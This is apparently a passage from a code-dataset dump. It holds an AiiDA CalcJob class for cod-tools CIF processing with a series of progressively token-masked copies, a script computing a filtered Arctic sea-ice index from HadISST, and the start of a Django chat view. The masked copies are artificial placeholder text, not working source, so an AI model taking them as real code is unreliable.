calcinfo.uuid = str(self.uuid)
calcinfo.codes_info = [codeinfo]
calcinfo.retrieve_list = [self.options.output_filename, self.options.error_filename]
calcinfo.local_copy_list = [(self.inputs.cif.uuid, self.inputs.cif.filename, self.options.input_filename)]
calcinfo.remote_copy_list = []
return calcinfo
| [
"# -*- coding: utf-8 -*-\n\"\"\"Generic `CalcJob` implementation that can easily be extended to work with any of the `cod-tools` scripts.\"\"\"\nimport copy\n\nfrom aiida.common import datastructures, exceptions\nfrom aiida.engine import CalcJob\nfrom aiida.orm import CifData, Dict\n\n\nclass CifBaseCalculation(CalcJob):\n \"\"\"Generic `CalcJob` implementation that can easily be extended to work with any of the `cod-tools` scripts.\"\"\"\n\n _default_parser = 'codtools.cif_base'\n _default_cli_parameters = {}\n\n @classmethod\n def define(cls, spec):\n # yapf: disable\n super().define(spec)\n spec.input('metadata.options.input_filename', valid_type=str, default='aiida.in',\n help='Filename to which the input for the code that is to be run will be written.')\n spec.input('metadata.options.output_filename', valid_type=str, default='aiida.out',\n help='Filename to which the content of stdout of the code that is to be run will be written.')\n spec.input('metadata.options.error_filename', valid_type=str, default='aiida.err',\n help='Filename to which the content of stderr of the code that is to be run will be written.')\n spec.input('metadata.options.parser_name', valid_type=str, default=cls._default_parser,\n help='Define the parser to be used by setting its entry point name.')\n spec.input('metadata.options.attach_messages', valid_type=bool, default=False,\n help='When True, warnings and errors written to stderr will be attached as the `messages` output node')\n\n spec.input('cif', valid_type=CifData, required=True,\n help='The CIF to be processed.')\n spec.input('parameters', valid_type=Dict, required=False,\n help='Command line parameters.')\n\n spec.output('messages', valid_type=Dict, required=False,\n help='Warning and error messages returned by script.')\n\n spec.exit_code(300, 'ERROR_NO_OUTPUT_FILES',\n message='Neither the output for the error file could be read from the retrieved folder.')\n spec.exit_code(311, 'ERROR_READING_OUTPUT_FILE',\n message='The output file could not be read from the retrieved folder.')\n spec.exit_code(312, 'ERROR_READING_ERROR_FILE',\n message='The error file could not be read from the retrieved folder.')\n spec.exit_code(313, 'ERROR_EMPTY_OUTPUT_FILE',\n message='The output file is empty.')\n spec.exit_code(320, 'ERROR_INVALID_COMMAND_LINE_OPTION',\n message='Invalid command line option passed.')\n spec.exit_code(400, 'ERROR_PARSING_OUTPUT_DATA',\n message='The output file could not be parsed.')\n spec.exit_code(410, 'ERROR_PARSING_CIF_DATA',\n message='The output file could not be parsed into a CifData object.')\n\n def _validate_resources(self):\n \"\"\"Validate the resources defined in the options.\"\"\"\n resources = self.options.resources\n\n for key in ['num_machines', 'num_mpiprocs_per_machine', 'tot_num_mpiprocs']:\n if key in resources and resources[key] != 1:\n raise exceptions.FeatureNotAvailable(\n f'Cannot set resource `{key}` to value `{resources[key]}` for `{self.__class__.__name__}`: '\n 'parallelization is not supported, only a value of `1` is accepted.'\n )\n\n def prepare_for_submission(self, folder):\n \"\"\"This method is called prior to job submission with a set of calculation input nodes.\n\n The inputs will be validated and sanitized, after which the necessary input files will be written to disk in a\n temporary folder. 
A CalcInfo instance will be returned that contains lists of files that need to be copied to\n the remote machine before job submission, as well as file lists that are to be retrieved after job completion.\n\n :param folder: an aiida.common.folders.Folder to temporarily write files on disk\n :returns: CalcInfo instance\n \"\"\"\n from aiida_codtools.cli.utils.parameters import CliParameters\n\n try:\n parameters = self.inputs.parameters.get_dict()\n except AttributeError:\n parameters = {}\n\n self._validate_resources()\n\n cli_parameters = copy.deepcopy(self._default_cli_parameters)\n cli_parameters.update(parameters)\n\n codeinfo = datastructures.CodeInfo()\n codeinfo.code_uuid = self.inputs.code.uuid\n codeinfo.cmdline_params = CliParameters.from_dictionary(cli_parameters).get_list()\n codeinfo.stdin_name = self.options.input_filename\n codeinfo.stdout_name = self.options.output_filename\n codeinfo.stderr_name = self.options.error_filename\n\n calcinfo = datastructures.CalcInfo()\n calcinfo.uuid = str(self.uuid)\n calcinfo.codes_info = [codeinfo]\n calcinfo.retrieve_list = [self.options.output_filename, self.options.error_filename]\n calcinfo.local_copy_list = [(self.inputs.cif.uuid, self.inputs.cif.filename, self.options.input_filename)]\n calcinfo.remote_copy_list = []\n\n return calcinfo\n",
"<docstring token>\nimport copy\nfrom aiida.common import datastructures, exceptions\nfrom aiida.engine import CalcJob\nfrom aiida.orm import CifData, Dict\n\n\nclass CifBaseCalculation(CalcJob):\n \"\"\"Generic `CalcJob` implementation that can easily be extended to work with any of the `cod-tools` scripts.\"\"\"\n _default_parser = 'codtools.cif_base'\n _default_cli_parameters = {}\n\n @classmethod\n def define(cls, spec):\n super().define(spec)\n spec.input('metadata.options.input_filename', valid_type=str,\n default='aiida.in', help=\n 'Filename to which the input for the code that is to be run will be written.'\n )\n spec.input('metadata.options.output_filename', valid_type=str,\n default='aiida.out', help=\n 'Filename to which the content of stdout of the code that is to be run will be written.'\n )\n spec.input('metadata.options.error_filename', valid_type=str,\n default='aiida.err', help=\n 'Filename to which the content of stderr of the code that is to be run will be written.'\n )\n spec.input('metadata.options.parser_name', valid_type=str, default=\n cls._default_parser, help=\n 'Define the parser to be used by setting its entry point name.')\n spec.input('metadata.options.attach_messages', valid_type=bool,\n default=False, help=\n 'When True, warnings and errors written to stderr will be attached as the `messages` output node'\n )\n spec.input('cif', valid_type=CifData, required=True, help=\n 'The CIF to be processed.')\n spec.input('parameters', valid_type=Dict, required=False, help=\n 'Command line parameters.')\n spec.output('messages', valid_type=Dict, required=False, help=\n 'Warning and error messages returned by script.')\n spec.exit_code(300, 'ERROR_NO_OUTPUT_FILES', message=\n 'Neither the output for the error file could be read from the retrieved folder.'\n )\n spec.exit_code(311, 'ERROR_READING_OUTPUT_FILE', message=\n 'The output file could not be read from the retrieved folder.')\n spec.exit_code(312, 'ERROR_READING_ERROR_FILE', message=\n 'The error file could not be read from the retrieved folder.')\n spec.exit_code(313, 'ERROR_EMPTY_OUTPUT_FILE', message=\n 'The output file is empty.')\n spec.exit_code(320, 'ERROR_INVALID_COMMAND_LINE_OPTION', message=\n 'Invalid command line option passed.')\n spec.exit_code(400, 'ERROR_PARSING_OUTPUT_DATA', message=\n 'The output file could not be parsed.')\n spec.exit_code(410, 'ERROR_PARSING_CIF_DATA', message=\n 'The output file could not be parsed into a CifData object.')\n\n def _validate_resources(self):\n \"\"\"Validate the resources defined in the options.\"\"\"\n resources = self.options.resources\n for key in ['num_machines', 'num_mpiprocs_per_machine',\n 'tot_num_mpiprocs']:\n if key in resources and resources[key] != 1:\n raise exceptions.FeatureNotAvailable(\n f'Cannot set resource `{key}` to value `{resources[key]}` for `{self.__class__.__name__}`: parallelization is not supported, only a value of `1` is accepted.'\n )\n\n def prepare_for_submission(self, folder):\n \"\"\"This method is called prior to job submission with a set of calculation input nodes.\n\n The inputs will be validated and sanitized, after which the necessary input files will be written to disk in a\n temporary folder. 
A CalcInfo instance will be returned that contains lists of files that need to be copied to\n the remote machine before job submission, as well as file lists that are to be retrieved after job completion.\n\n :param folder: an aiida.common.folders.Folder to temporarily write files on disk\n :returns: CalcInfo instance\n \"\"\"\n from aiida_codtools.cli.utils.parameters import CliParameters\n try:\n parameters = self.inputs.parameters.get_dict()\n except AttributeError:\n parameters = {}\n self._validate_resources()\n cli_parameters = copy.deepcopy(self._default_cli_parameters)\n cli_parameters.update(parameters)\n codeinfo = datastructures.CodeInfo()\n codeinfo.code_uuid = self.inputs.code.uuid\n codeinfo.cmdline_params = CliParameters.from_dictionary(cli_parameters\n ).get_list()\n codeinfo.stdin_name = self.options.input_filename\n codeinfo.stdout_name = self.options.output_filename\n codeinfo.stderr_name = self.options.error_filename\n calcinfo = datastructures.CalcInfo()\n calcinfo.uuid = str(self.uuid)\n calcinfo.codes_info = [codeinfo]\n calcinfo.retrieve_list = [self.options.output_filename, self.\n options.error_filename]\n calcinfo.local_copy_list = [(self.inputs.cif.uuid, self.inputs.cif.\n filename, self.options.input_filename)]\n calcinfo.remote_copy_list = []\n return calcinfo\n",
"<docstring token>\n<import token>\n\n\nclass CifBaseCalculation(CalcJob):\n \"\"\"Generic `CalcJob` implementation that can easily be extended to work with any of the `cod-tools` scripts.\"\"\"\n _default_parser = 'codtools.cif_base'\n _default_cli_parameters = {}\n\n @classmethod\n def define(cls, spec):\n super().define(spec)\n spec.input('metadata.options.input_filename', valid_type=str,\n default='aiida.in', help=\n 'Filename to which the input for the code that is to be run will be written.'\n )\n spec.input('metadata.options.output_filename', valid_type=str,\n default='aiida.out', help=\n 'Filename to which the content of stdout of the code that is to be run will be written.'\n )\n spec.input('metadata.options.error_filename', valid_type=str,\n default='aiida.err', help=\n 'Filename to which the content of stderr of the code that is to be run will be written.'\n )\n spec.input('metadata.options.parser_name', valid_type=str, default=\n cls._default_parser, help=\n 'Define the parser to be used by setting its entry point name.')\n spec.input('metadata.options.attach_messages', valid_type=bool,\n default=False, help=\n 'When True, warnings and errors written to stderr will be attached as the `messages` output node'\n )\n spec.input('cif', valid_type=CifData, required=True, help=\n 'The CIF to be processed.')\n spec.input('parameters', valid_type=Dict, required=False, help=\n 'Command line parameters.')\n spec.output('messages', valid_type=Dict, required=False, help=\n 'Warning and error messages returned by script.')\n spec.exit_code(300, 'ERROR_NO_OUTPUT_FILES', message=\n 'Neither the output for the error file could be read from the retrieved folder.'\n )\n spec.exit_code(311, 'ERROR_READING_OUTPUT_FILE', message=\n 'The output file could not be read from the retrieved folder.')\n spec.exit_code(312, 'ERROR_READING_ERROR_FILE', message=\n 'The error file could not be read from the retrieved folder.')\n spec.exit_code(313, 'ERROR_EMPTY_OUTPUT_FILE', message=\n 'The output file is empty.')\n spec.exit_code(320, 'ERROR_INVALID_COMMAND_LINE_OPTION', message=\n 'Invalid command line option passed.')\n spec.exit_code(400, 'ERROR_PARSING_OUTPUT_DATA', message=\n 'The output file could not be parsed.')\n spec.exit_code(410, 'ERROR_PARSING_CIF_DATA', message=\n 'The output file could not be parsed into a CifData object.')\n\n def _validate_resources(self):\n \"\"\"Validate the resources defined in the options.\"\"\"\n resources = self.options.resources\n for key in ['num_machines', 'num_mpiprocs_per_machine',\n 'tot_num_mpiprocs']:\n if key in resources and resources[key] != 1:\n raise exceptions.FeatureNotAvailable(\n f'Cannot set resource `{key}` to value `{resources[key]}` for `{self.__class__.__name__}`: parallelization is not supported, only a value of `1` is accepted.'\n )\n\n def prepare_for_submission(self, folder):\n \"\"\"This method is called prior to job submission with a set of calculation input nodes.\n\n The inputs will be validated and sanitized, after which the necessary input files will be written to disk in a\n temporary folder. 
A CalcInfo instance will be returned that contains lists of files that need to be copied to\n the remote machine before job submission, as well as file lists that are to be retrieved after job completion.\n\n :param folder: an aiida.common.folders.Folder to temporarily write files on disk\n :returns: CalcInfo instance\n \"\"\"\n from aiida_codtools.cli.utils.parameters import CliParameters\n try:\n parameters = self.inputs.parameters.get_dict()\n except AttributeError:\n parameters = {}\n self._validate_resources()\n cli_parameters = copy.deepcopy(self._default_cli_parameters)\n cli_parameters.update(parameters)\n codeinfo = datastructures.CodeInfo()\n codeinfo.code_uuid = self.inputs.code.uuid\n codeinfo.cmdline_params = CliParameters.from_dictionary(cli_parameters\n ).get_list()\n codeinfo.stdin_name = self.options.input_filename\n codeinfo.stdout_name = self.options.output_filename\n codeinfo.stderr_name = self.options.error_filename\n calcinfo = datastructures.CalcInfo()\n calcinfo.uuid = str(self.uuid)\n calcinfo.codes_info = [codeinfo]\n calcinfo.retrieve_list = [self.options.output_filename, self.\n options.error_filename]\n calcinfo.local_copy_list = [(self.inputs.cif.uuid, self.inputs.cif.\n filename, self.options.input_filename)]\n calcinfo.remote_copy_list = []\n return calcinfo\n",
"<docstring token>\n<import token>\n\n\nclass CifBaseCalculation(CalcJob):\n <docstring token>\n _default_parser = 'codtools.cif_base'\n _default_cli_parameters = {}\n\n @classmethod\n def define(cls, spec):\n super().define(spec)\n spec.input('metadata.options.input_filename', valid_type=str,\n default='aiida.in', help=\n 'Filename to which the input for the code that is to be run will be written.'\n )\n spec.input('metadata.options.output_filename', valid_type=str,\n default='aiida.out', help=\n 'Filename to which the content of stdout of the code that is to be run will be written.'\n )\n spec.input('metadata.options.error_filename', valid_type=str,\n default='aiida.err', help=\n 'Filename to which the content of stderr of the code that is to be run will be written.'\n )\n spec.input('metadata.options.parser_name', valid_type=str, default=\n cls._default_parser, help=\n 'Define the parser to be used by setting its entry point name.')\n spec.input('metadata.options.attach_messages', valid_type=bool,\n default=False, help=\n 'When True, warnings and errors written to stderr will be attached as the `messages` output node'\n )\n spec.input('cif', valid_type=CifData, required=True, help=\n 'The CIF to be processed.')\n spec.input('parameters', valid_type=Dict, required=False, help=\n 'Command line parameters.')\n spec.output('messages', valid_type=Dict, required=False, help=\n 'Warning and error messages returned by script.')\n spec.exit_code(300, 'ERROR_NO_OUTPUT_FILES', message=\n 'Neither the output for the error file could be read from the retrieved folder.'\n )\n spec.exit_code(311, 'ERROR_READING_OUTPUT_FILE', message=\n 'The output file could not be read from the retrieved folder.')\n spec.exit_code(312, 'ERROR_READING_ERROR_FILE', message=\n 'The error file could not be read from the retrieved folder.')\n spec.exit_code(313, 'ERROR_EMPTY_OUTPUT_FILE', message=\n 'The output file is empty.')\n spec.exit_code(320, 'ERROR_INVALID_COMMAND_LINE_OPTION', message=\n 'Invalid command line option passed.')\n spec.exit_code(400, 'ERROR_PARSING_OUTPUT_DATA', message=\n 'The output file could not be parsed.')\n spec.exit_code(410, 'ERROR_PARSING_CIF_DATA', message=\n 'The output file could not be parsed into a CifData object.')\n\n def _validate_resources(self):\n \"\"\"Validate the resources defined in the options.\"\"\"\n resources = self.options.resources\n for key in ['num_machines', 'num_mpiprocs_per_machine',\n 'tot_num_mpiprocs']:\n if key in resources and resources[key] != 1:\n raise exceptions.FeatureNotAvailable(\n f'Cannot set resource `{key}` to value `{resources[key]}` for `{self.__class__.__name__}`: parallelization is not supported, only a value of `1` is accepted.'\n )\n\n def prepare_for_submission(self, folder):\n \"\"\"This method is called prior to job submission with a set of calculation input nodes.\n\n The inputs will be validated and sanitized, after which the necessary input files will be written to disk in a\n temporary folder. 
A CalcInfo instance will be returned that contains lists of files that need to be copied to\n the remote machine before job submission, as well as file lists that are to be retrieved after job completion.\n\n :param folder: an aiida.common.folders.Folder to temporarily write files on disk\n :returns: CalcInfo instance\n \"\"\"\n from aiida_codtools.cli.utils.parameters import CliParameters\n try:\n parameters = self.inputs.parameters.get_dict()\n except AttributeError:\n parameters = {}\n self._validate_resources()\n cli_parameters = copy.deepcopy(self._default_cli_parameters)\n cli_parameters.update(parameters)\n codeinfo = datastructures.CodeInfo()\n codeinfo.code_uuid = self.inputs.code.uuid\n codeinfo.cmdline_params = CliParameters.from_dictionary(cli_parameters\n ).get_list()\n codeinfo.stdin_name = self.options.input_filename\n codeinfo.stdout_name = self.options.output_filename\n codeinfo.stderr_name = self.options.error_filename\n calcinfo = datastructures.CalcInfo()\n calcinfo.uuid = str(self.uuid)\n calcinfo.codes_info = [codeinfo]\n calcinfo.retrieve_list = [self.options.output_filename, self.\n options.error_filename]\n calcinfo.local_copy_list = [(self.inputs.cif.uuid, self.inputs.cif.\n filename, self.options.input_filename)]\n calcinfo.remote_copy_list = []\n return calcinfo\n",
"<docstring token>\n<import token>\n\n\nclass CifBaseCalculation(CalcJob):\n <docstring token>\n <assignment token>\n <assignment token>\n\n @classmethod\n def define(cls, spec):\n super().define(spec)\n spec.input('metadata.options.input_filename', valid_type=str,\n default='aiida.in', help=\n 'Filename to which the input for the code that is to be run will be written.'\n )\n spec.input('metadata.options.output_filename', valid_type=str,\n default='aiida.out', help=\n 'Filename to which the content of stdout of the code that is to be run will be written.'\n )\n spec.input('metadata.options.error_filename', valid_type=str,\n default='aiida.err', help=\n 'Filename to which the content of stderr of the code that is to be run will be written.'\n )\n spec.input('metadata.options.parser_name', valid_type=str, default=\n cls._default_parser, help=\n 'Define the parser to be used by setting its entry point name.')\n spec.input('metadata.options.attach_messages', valid_type=bool,\n default=False, help=\n 'When True, warnings and errors written to stderr will be attached as the `messages` output node'\n )\n spec.input('cif', valid_type=CifData, required=True, help=\n 'The CIF to be processed.')\n spec.input('parameters', valid_type=Dict, required=False, help=\n 'Command line parameters.')\n spec.output('messages', valid_type=Dict, required=False, help=\n 'Warning and error messages returned by script.')\n spec.exit_code(300, 'ERROR_NO_OUTPUT_FILES', message=\n 'Neither the output for the error file could be read from the retrieved folder.'\n )\n spec.exit_code(311, 'ERROR_READING_OUTPUT_FILE', message=\n 'The output file could not be read from the retrieved folder.')\n spec.exit_code(312, 'ERROR_READING_ERROR_FILE', message=\n 'The error file could not be read from the retrieved folder.')\n spec.exit_code(313, 'ERROR_EMPTY_OUTPUT_FILE', message=\n 'The output file is empty.')\n spec.exit_code(320, 'ERROR_INVALID_COMMAND_LINE_OPTION', message=\n 'Invalid command line option passed.')\n spec.exit_code(400, 'ERROR_PARSING_OUTPUT_DATA', message=\n 'The output file could not be parsed.')\n spec.exit_code(410, 'ERROR_PARSING_CIF_DATA', message=\n 'The output file could not be parsed into a CifData object.')\n\n def _validate_resources(self):\n \"\"\"Validate the resources defined in the options.\"\"\"\n resources = self.options.resources\n for key in ['num_machines', 'num_mpiprocs_per_machine',\n 'tot_num_mpiprocs']:\n if key in resources and resources[key] != 1:\n raise exceptions.FeatureNotAvailable(\n f'Cannot set resource `{key}` to value `{resources[key]}` for `{self.__class__.__name__}`: parallelization is not supported, only a value of `1` is accepted.'\n )\n\n def prepare_for_submission(self, folder):\n \"\"\"This method is called prior to job submission with a set of calculation input nodes.\n\n The inputs will be validated and sanitized, after which the necessary input files will be written to disk in a\n temporary folder. 
A CalcInfo instance will be returned that contains lists of files that need to be copied to\n the remote machine before job submission, as well as file lists that are to be retrieved after job completion.\n\n :param folder: an aiida.common.folders.Folder to temporarily write files on disk\n :returns: CalcInfo instance\n \"\"\"\n from aiida_codtools.cli.utils.parameters import CliParameters\n try:\n parameters = self.inputs.parameters.get_dict()\n except AttributeError:\n parameters = {}\n self._validate_resources()\n cli_parameters = copy.deepcopy(self._default_cli_parameters)\n cli_parameters.update(parameters)\n codeinfo = datastructures.CodeInfo()\n codeinfo.code_uuid = self.inputs.code.uuid\n codeinfo.cmdline_params = CliParameters.from_dictionary(cli_parameters\n ).get_list()\n codeinfo.stdin_name = self.options.input_filename\n codeinfo.stdout_name = self.options.output_filename\n codeinfo.stderr_name = self.options.error_filename\n calcinfo = datastructures.CalcInfo()\n calcinfo.uuid = str(self.uuid)\n calcinfo.codes_info = [codeinfo]\n calcinfo.retrieve_list = [self.options.output_filename, self.\n options.error_filename]\n calcinfo.local_copy_list = [(self.inputs.cif.uuid, self.inputs.cif.\n filename, self.options.input_filename)]\n calcinfo.remote_copy_list = []\n return calcinfo\n",
"<docstring token>\n<import token>\n\n\nclass CifBaseCalculation(CalcJob):\n <docstring token>\n <assignment token>\n <assignment token>\n\n @classmethod\n def define(cls, spec):\n super().define(spec)\n spec.input('metadata.options.input_filename', valid_type=str,\n default='aiida.in', help=\n 'Filename to which the input for the code that is to be run will be written.'\n )\n spec.input('metadata.options.output_filename', valid_type=str,\n default='aiida.out', help=\n 'Filename to which the content of stdout of the code that is to be run will be written.'\n )\n spec.input('metadata.options.error_filename', valid_type=str,\n default='aiida.err', help=\n 'Filename to which the content of stderr of the code that is to be run will be written.'\n )\n spec.input('metadata.options.parser_name', valid_type=str, default=\n cls._default_parser, help=\n 'Define the parser to be used by setting its entry point name.')\n spec.input('metadata.options.attach_messages', valid_type=bool,\n default=False, help=\n 'When True, warnings and errors written to stderr will be attached as the `messages` output node'\n )\n spec.input('cif', valid_type=CifData, required=True, help=\n 'The CIF to be processed.')\n spec.input('parameters', valid_type=Dict, required=False, help=\n 'Command line parameters.')\n spec.output('messages', valid_type=Dict, required=False, help=\n 'Warning and error messages returned by script.')\n spec.exit_code(300, 'ERROR_NO_OUTPUT_FILES', message=\n 'Neither the output for the error file could be read from the retrieved folder.'\n )\n spec.exit_code(311, 'ERROR_READING_OUTPUT_FILE', message=\n 'The output file could not be read from the retrieved folder.')\n spec.exit_code(312, 'ERROR_READING_ERROR_FILE', message=\n 'The error file could not be read from the retrieved folder.')\n spec.exit_code(313, 'ERROR_EMPTY_OUTPUT_FILE', message=\n 'The output file is empty.')\n spec.exit_code(320, 'ERROR_INVALID_COMMAND_LINE_OPTION', message=\n 'Invalid command line option passed.')\n spec.exit_code(400, 'ERROR_PARSING_OUTPUT_DATA', message=\n 'The output file could not be parsed.')\n spec.exit_code(410, 'ERROR_PARSING_CIF_DATA', message=\n 'The output file could not be parsed into a CifData object.')\n <function token>\n\n def prepare_for_submission(self, folder):\n \"\"\"This method is called prior to job submission with a set of calculation input nodes.\n\n The inputs will be validated and sanitized, after which the necessary input files will be written to disk in a\n temporary folder. 
A CalcInfo instance will be returned that contains lists of files that need to be copied to\n the remote machine before job submission, as well as file lists that are to be retrieved after job completion.\n\n :param folder: an aiida.common.folders.Folder to temporarily write files on disk\n :returns: CalcInfo instance\n \"\"\"\n from aiida_codtools.cli.utils.parameters import CliParameters\n try:\n parameters = self.inputs.parameters.get_dict()\n except AttributeError:\n parameters = {}\n self._validate_resources()\n cli_parameters = copy.deepcopy(self._default_cli_parameters)\n cli_parameters.update(parameters)\n codeinfo = datastructures.CodeInfo()\n codeinfo.code_uuid = self.inputs.code.uuid\n codeinfo.cmdline_params = CliParameters.from_dictionary(cli_parameters\n ).get_list()\n codeinfo.stdin_name = self.options.input_filename\n codeinfo.stdout_name = self.options.output_filename\n codeinfo.stderr_name = self.options.error_filename\n calcinfo = datastructures.CalcInfo()\n calcinfo.uuid = str(self.uuid)\n calcinfo.codes_info = [codeinfo]\n calcinfo.retrieve_list = [self.options.output_filename, self.\n options.error_filename]\n calcinfo.local_copy_list = [(self.inputs.cif.uuid, self.inputs.cif.\n filename, self.options.input_filename)]\n calcinfo.remote_copy_list = []\n return calcinfo\n",
"<docstring token>\n<import token>\n\n\nclass CifBaseCalculation(CalcJob):\n <docstring token>\n <assignment token>\n <assignment token>\n <function token>\n <function token>\n\n def prepare_for_submission(self, folder):\n \"\"\"This method is called prior to job submission with a set of calculation input nodes.\n\n The inputs will be validated and sanitized, after which the necessary input files will be written to disk in a\n temporary folder. A CalcInfo instance will be returned that contains lists of files that need to be copied to\n the remote machine before job submission, as well as file lists that are to be retrieved after job completion.\n\n :param folder: an aiida.common.folders.Folder to temporarily write files on disk\n :returns: CalcInfo instance\n \"\"\"\n from aiida_codtools.cli.utils.parameters import CliParameters\n try:\n parameters = self.inputs.parameters.get_dict()\n except AttributeError:\n parameters = {}\n self._validate_resources()\n cli_parameters = copy.deepcopy(self._default_cli_parameters)\n cli_parameters.update(parameters)\n codeinfo = datastructures.CodeInfo()\n codeinfo.code_uuid = self.inputs.code.uuid\n codeinfo.cmdline_params = CliParameters.from_dictionary(cli_parameters\n ).get_list()\n codeinfo.stdin_name = self.options.input_filename\n codeinfo.stdout_name = self.options.output_filename\n codeinfo.stderr_name = self.options.error_filename\n calcinfo = datastructures.CalcInfo()\n calcinfo.uuid = str(self.uuid)\n calcinfo.codes_info = [codeinfo]\n calcinfo.retrieve_list = [self.options.output_filename, self.\n options.error_filename]\n calcinfo.local_copy_list = [(self.inputs.cif.uuid, self.inputs.cif.\n filename, self.options.input_filename)]\n calcinfo.remote_copy_list = []\n return calcinfo\n",
"<docstring token>\n<import token>\n\n\nclass CifBaseCalculation(CalcJob):\n <docstring token>\n <assignment token>\n <assignment token>\n <function token>\n <function token>\n <function token>\n",
"<docstring token>\n<import token>\n<class token>\n"
] | false |
99,863 | 5c377b349b2ddc8fc261932170d2699bb81bf236 | import numpy as np
import xarray as xr
import sys
sys.path.append("../utils/")
from conform_dim import conform_dim
from fourier_filter_high_pass import fourier_filter_high_pass
ds = xr.open_dataset('../data/HadISST_ice.nc')
year_start = 1979
year_end = 2020
year = range(year_start, year_end)
nyears = year_end - year_start + 1
var = ds['sic']
lat = ds['latitude']
lon = ds['longitude']
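# September, October and November sea-ice concentration fields for the years 1979-2019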
var_sep = var.sel(time=var.time.dt.month.isin(9)&var.time.dt.year.isin([x for x in range(year_start,year_end)]))
var_oct = var.sel(time=var.time.dt.month.isin(10)&var.time.dt.year.isin([x for x in range(year_start,year_end)]))
var_nov = var.sel(time=var.time.dt.month.isin(11)&var.time.dt.year.isin([x for x in range(year_start,year_end)]))
# SON
SON = (var_sep.values+var_oct.values+var_nov.values) / 3.0
var_son = xr.DataArray(SON, coords=[("time",var_sep['time'].values),("lat",lat.values),("lon",lon.values)])
var_son.coords['lon'] = (var_son.coords['lon'] + 360) % 360
var_son = var_son.sortby(var_son.lon)
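# Weight each grid cell by the cosine of its latitude before the area average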
var_son = var_son * conform_dim(np.cos(lat.values*np.pi/180.0),var_son,(0,2))
target = var_son.loc[:,80:71,120:225].mean(dim="lon").mean(dim="lat")
ts = target.values
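# Remove slow, low-frequency variability with a Fourier high-pass filter (cutoff parameter 11, presumably in years)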
ts = fourier_filter_high_pass(ts, 11)
np.savetxt("idx-filter.txt",ts)
| [
"import numpy as np\nimport xarray as xr\n\nimport sys\nsys.path.append(\"../utils/\")\n\nfrom conform_dim import conform_dim\nfrom fourier_filter_high_pass import fourier_filter_high_pass\n\nds = xr.open_dataset('../data/HadISST_ice.nc')\n\nyear_start = 1979\nyear_end = 2020\nyear = range(year_start, year_end)\nnyears = year_end - year_start + 1\n\nvar = ds['sic']\nlat = ds['latitude']\nlon = ds['longitude']\n\nvar_sep = var.sel(time=var.time.dt.month.isin(9)&var.time.dt.year.isin([x for x in range(year_start,year_end)])) \nvar_oct = var.sel(time=var.time.dt.month.isin(10)&var.time.dt.year.isin([x for x in range(year_start,year_end)])) \nvar_nov = var.sel(time=var.time.dt.month.isin(11)&var.time.dt.year.isin([x for x in range(year_start,year_end)])) \n\n# SON\nSON = (var_sep.values+var_oct.values+var_nov.values) / 3.0\nvar_son = xr.DataArray(SON, coords=[(\"time\",var_sep['time'].values),(\"lat\",lat.values),(\"lon\",lon.values)])\n\nvar_son.coords['lon'] = (var_son.coords['lon'] + 360) % 360 \nvar_son = var_son.sortby(var_son.lon)\n\nvar_son = var_son * conform_dim(np.cos(lat.values*np.pi/180.0),var_son,(0,2))\n\ntarget = var_son.loc[:,80:71,120:225].mean(dim=\"lon\").mean(dim=\"lat\")\n\nts = target.values\n\nts = fourier_filter_high_pass(ts, 11)\n\nnp.savetxt(\"idx-filter.txt\",ts)\n",
"import numpy as np\nimport xarray as xr\nimport sys\nsys.path.append('../utils/')\nfrom conform_dim import conform_dim\nfrom fourier_filter_high_pass import fourier_filter_high_pass\nds = xr.open_dataset('../data/HadISST_ice.nc')\nyear_start = 1979\nyear_end = 2020\nyear = range(year_start, year_end)\nnyears = year_end - year_start + 1\nvar = ds['sic']\nlat = ds['latitude']\nlon = ds['longitude']\nvar_sep = var.sel(time=var.time.dt.month.isin(9) & var.time.dt.year.isin([x for\n x in range(year_start, year_end)]))\nvar_oct = var.sel(time=var.time.dt.month.isin(10) & var.time.dt.year.isin([\n x for x in range(year_start, year_end)]))\nvar_nov = var.sel(time=var.time.dt.month.isin(11) & var.time.dt.year.isin([\n x for x in range(year_start, year_end)]))\nSON = (var_sep.values + var_oct.values + var_nov.values) / 3.0\nvar_son = xr.DataArray(SON, coords=[('time', var_sep['time'].values), (\n 'lat', lat.values), ('lon', lon.values)])\nvar_son.coords['lon'] = (var_son.coords['lon'] + 360) % 360\nvar_son = var_son.sortby(var_son.lon)\nvar_son = var_son * conform_dim(np.cos(lat.values * np.pi / 180.0), var_son,\n (0, 2))\ntarget = var_son.loc[:, 80:71, 120:225].mean(dim='lon').mean(dim='lat')\nts = target.values\nts = fourier_filter_high_pass(ts, 11)\nnp.savetxt('idx-filter.txt', ts)\n",
"<import token>\nsys.path.append('../utils/')\n<import token>\nds = xr.open_dataset('../data/HadISST_ice.nc')\nyear_start = 1979\nyear_end = 2020\nyear = range(year_start, year_end)\nnyears = year_end - year_start + 1\nvar = ds['sic']\nlat = ds['latitude']\nlon = ds['longitude']\nvar_sep = var.sel(time=var.time.dt.month.isin(9) & var.time.dt.year.isin([x for\n x in range(year_start, year_end)]))\nvar_oct = var.sel(time=var.time.dt.month.isin(10) & var.time.dt.year.isin([\n x for x in range(year_start, year_end)]))\nvar_nov = var.sel(time=var.time.dt.month.isin(11) & var.time.dt.year.isin([\n x for x in range(year_start, year_end)]))\nSON = (var_sep.values + var_oct.values + var_nov.values) / 3.0\nvar_son = xr.DataArray(SON, coords=[('time', var_sep['time'].values), (\n 'lat', lat.values), ('lon', lon.values)])\nvar_son.coords['lon'] = (var_son.coords['lon'] + 360) % 360\nvar_son = var_son.sortby(var_son.lon)\nvar_son = var_son * conform_dim(np.cos(lat.values * np.pi / 180.0), var_son,\n (0, 2))\ntarget = var_son.loc[:, 80:71, 120:225].mean(dim='lon').mean(dim='lat')\nts = target.values\nts = fourier_filter_high_pass(ts, 11)\nnp.savetxt('idx-filter.txt', ts)\n",
"<import token>\nsys.path.append('../utils/')\n<import token>\n<assignment token>\nnp.savetxt('idx-filter.txt', ts)\n",
"<import token>\n<code token>\n<import token>\n<assignment token>\n<code token>\n"
] | false |
99,864 | e3c650c2441e2f348b3ceac3f9e0cdd8297547b8 | import os
from chat.models import Chat, Jobs, Qualified
import speech_recognition as sr
from django.http import HttpResponse
from django.http import JsonResponse
from django.contrib.auth.models import User
from django.shortcuts import render, redirect
def home(request):
chats = Chat.objects.all()
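    # Users that have posted at least one message (the filter presumably relies on the Chat model's related_name 'messages')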
all_users = User.objects.filter(messages__isnull=False).distinct()
ctx = {
'home': 'active',
'chat': chats,
'allusers': all_users
}
if request.user.is_authenticated:
return render(request, 'chat.html', ctx)
else:
return render(request, 'base.html', None)
def upload(request):
customHeader = request.META['HTTP_MYCUSTOMHEADER']
